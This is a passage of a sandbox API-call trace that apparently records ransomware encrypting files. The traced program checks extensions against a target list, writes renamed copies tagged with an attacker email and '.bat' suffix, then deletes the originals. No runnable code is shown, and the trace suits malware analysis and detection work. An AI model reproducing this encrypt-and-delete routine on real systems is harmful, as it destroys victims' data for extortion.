(lpString1=".docx", lpString2="_.GIF") returned -1 [0060.854] lstrlenW (lpString=".pdf") returned 4 [0060.854] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.854] lstrlenW (lpString=".xls") returned 4 [0060.854] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.854] lstrlenW (lpString=".xlsx") returned 5 [0060.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.854] lstrlenW (lpString=".ppt") returned 4 [0060.855] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.855] lstrlenW (lpString=".zip") returned 4 [0060.855] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.855] lstrlenW (lpString=".rar") returned 4 [0060.855] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.855] lstrlenW (lpString=".bz2") returned 4 [0060.855] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.855] lstrlenW (lpString=".7z") returned 3 [0060.855] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.855] lstrlenW (lpString=".dbf") returned 4 [0060.855] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.855] lstrlenW (lpString=".1cd") returned 4 [0060.855] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.855] lstrlenW (lpString=".jpg") returned 4 [0060.855] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.855] lstrlenW (lpString=".doc") returned 4 [0060.855] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.855] lstrlenW (lpString=".docx") returned 5 [0060.855] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.855] lstrlenW (lpString=".pdf") returned 4 [0060.855] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.856] lstrlenW (lpString=".xls") returned 4 [0060.856] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.856] lstrlenW (lpString=".xlsx") returned 5 [0060.856] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.856] lstrlenW (lpString=".ppt") returned 4 [0060.856] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.856] lstrlenW (lpString=".zip") returned 4 [0060.856] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.856] lstrlenW (lpString=".rar") returned 4 [0060.856] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.856] lstrlenW (lpString=".bz2") returned 4 [0060.856] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.856] lstrlenW (lpString=".7z") returned 3 [0060.856] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.856] lstrlenW (lpString=".dbf") returned 4 [0060.856] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.856] lstrlenW (lpString=".1cd") returned 4 [0060.856] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.856] lstrlenW (lpString=".jpg") returned 4 [0060.856] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.856] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.857] lstrlenW (lpString="AG00139_.GIF") returned 12 [0060.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.857] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=10607) returned 1 [0060.857] CloseHandle (hObject=0x358) returned 1 [0060.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif")) returned 0x220 [0060.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.857] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.857] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.858] GetLastError () returned 0x0 [0060.858] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x296f, lpOverlapped=0x0) returned 1 [0061.443] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2970, lpOverlapped=0x0) returned 1 [0061.444] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.444] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.444] SetEndOfFile (hFile=0x350) returned 1 [0061.444] CloseHandle (hObject=0x350) returned 1 [0061.445] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.445] SetEndOfFile (hFile=0x358) returned 1 [0061.446] CloseHandle (hObject=0x358) returned 1 [0061.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.446] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0061.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.449] lstrlenW (lpString=".doc") returned 4 [0061.449] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.449] lstrlenW (lpString=".docx") returned 5 [0061.449] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.449] lstrlenW (lpString=".pdf") returned 4 [0061.449] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.449] lstrlenW (lpString=".xls") returned 4 [0061.449] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.449] lstrlenW (lpString=".xlsx") returned 5 [0061.449] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.449] lstrlenW (lpString=".ppt") returned 4 [0061.449] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.449] lstrlenW (lpString=".zip") returned 4 [0061.449] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.449] lstrlenW (lpString=".rar") returned 4 [0061.449] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.449] lstrlenW (lpString=".bz2") returned 4 [0061.449] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.449] lstrlenW (lpString=".7z") returned 3 [0061.449] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.450] lstrlenW (lpString=".dbf") returned 4 [0061.450] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.450] lstrlenW (lpString=".1cd") returned 4 [0061.450] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.450] lstrlenW (lpString=".jpg") returned 4 [0061.450] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.450] lstrlenW (lpString=".doc") returned 4 [0061.450] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.450] lstrlenW (lpString=".docx") returned 5 [0061.450] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.450] lstrlenW (lpString=".pdf") returned 4 [0061.450] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.450] lstrlenW (lpString=".xls") returned 4 [0061.450] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.450] lstrlenW (lpString=".xlsx") returned 5 [0061.450] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.450] lstrlenW (lpString=".ppt") returned 4 [0061.450] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.450] lstrlenW (lpString=".zip") returned 4 [0061.450] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.450] lstrlenW (lpString=".rar") returned 4 [0061.450] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.451] lstrlenW (lpString=".bz2") returned 4 [0061.451] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.451] lstrlenW (lpString=".7z") returned 3 [0061.451] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.451] lstrlenW (lpString=".dbf") returned 4 [0061.451] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.451] lstrlenW (lpString=".1cd") returned 4 [0061.451] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0061.451] lstrlenW (lpString=".jpg") returned 4 [0061.451] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.451] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.451] lstrlenW (lpString="AG00158_.GIF") returned 12 [0061.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.455] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=5030) returned 1 [0061.455] CloseHandle (hObject=0x350) returned 1 [0061.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif")) returned 0x220 [0061.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.456] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.456] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.456] GetLastError () returned 0x0 [0061.456] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x13a6, lpOverlapped=0x0) returned 1 [0061.475] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13b0, lpOverlapped=0x0) returned 1 [0061.476] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.476] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.477] SetEndOfFile (hFile=0x340) returned 1 [0061.477] CloseHandle (hObject=0x340) returned 1 [0061.477] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.477] SetEndOfFile (hFile=0x350) returned 1 [0061.478] CloseHandle (hObject=0x350) returned 1 [0061.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0061.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.479] lstrlenW (lpString=".doc") returned 4 [0061.479] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.479] lstrlenW (lpString=".docx") returned 5 [0061.479] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.479] lstrlenW (lpString=".pdf") returned 4 [0061.479] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.479] lstrlenW (lpString=".xls") returned 4 [0061.479] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.479] lstrlenW (lpString=".xlsx") returned 5 [0061.479] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.479] lstrlenW (lpString=".ppt") returned 4 [0061.479] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.479] lstrlenW (lpString=".zip") returned 4 [0061.479] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.479] lstrlenW (lpString=".rar") returned 4 [0061.479] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.479] lstrlenW (lpString=".bz2") returned 4 [0061.479] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.479] lstrlenW (lpString=".7z") returned 3 [0061.479] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.479] lstrlenW (lpString=".dbf") returned 4 [0061.479] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.480] lstrlenW (lpString=".1cd") returned 4 [0061.480] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.480] lstrlenW (lpString=".jpg") returned 4 [0061.480] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.480] lstrlenW (lpString=".doc") returned 4 [0061.480] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.480] lstrlenW (lpString=".docx") returned 5 [0061.480] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.480] lstrlenW (lpString=".pdf") returned 4 [0061.480] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.480] lstrlenW (lpString=".xls") returned 4 [0061.480] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.480] lstrlenW (lpString=".xlsx") returned 5 [0061.480] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.480] lstrlenW (lpString=".ppt") returned 4 [0061.480] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.480] lstrlenW (lpString=".zip") returned 4 [0061.480] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.480] lstrlenW (lpString=".rar") returned 4 [0061.480] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.480] lstrlenW (lpString=".bz2") returned 4 [0061.480] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.480] lstrlenW (lpString=".7z") returned 3 [0061.481] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.481] lstrlenW (lpString=".dbf") returned 4 [0061.481] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.481] lstrlenW (lpString=".1cd") returned 4 [0061.481] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0061.481] lstrlenW (lpString=".jpg") returned 4 [0061.481] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.481] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.481] lstrlenW (lpString="AG00163_.GIF") returned 12 [0061.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.481] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=6984) returned 1 [0061.481] CloseHandle (hObject=0x350) returned 1 [0061.481] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif")) returned 0x220 [0061.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.482] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.482] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.482] GetLastError () returned 0x0 [0061.482] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1b48, lpOverlapped=0x0) returned 1 [0061.590] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1b50, lpOverlapped=0x0) returned 1 [0061.591] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.592] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.592] SetEndOfFile (hFile=0x340) returned 1 [0061.592] CloseHandle (hObject=0x340) returned 1 [0061.593] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.593] SetEndOfFile (hFile=0x350) returned 1 [0061.594] CloseHandle (hObject=0x350) returned 1 [0061.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0061.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.599] lstrlenW (lpString=".doc") returned 4 [0061.599] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.599] lstrlenW (lpString=".docx") returned 5 [0061.599] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.599] lstrlenW (lpString=".pdf") returned 4 [0061.599] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.599] lstrlenW (lpString=".xls") returned 4 [0061.599] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.599] lstrlenW (lpString=".xlsx") returned 5 [0061.599] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") 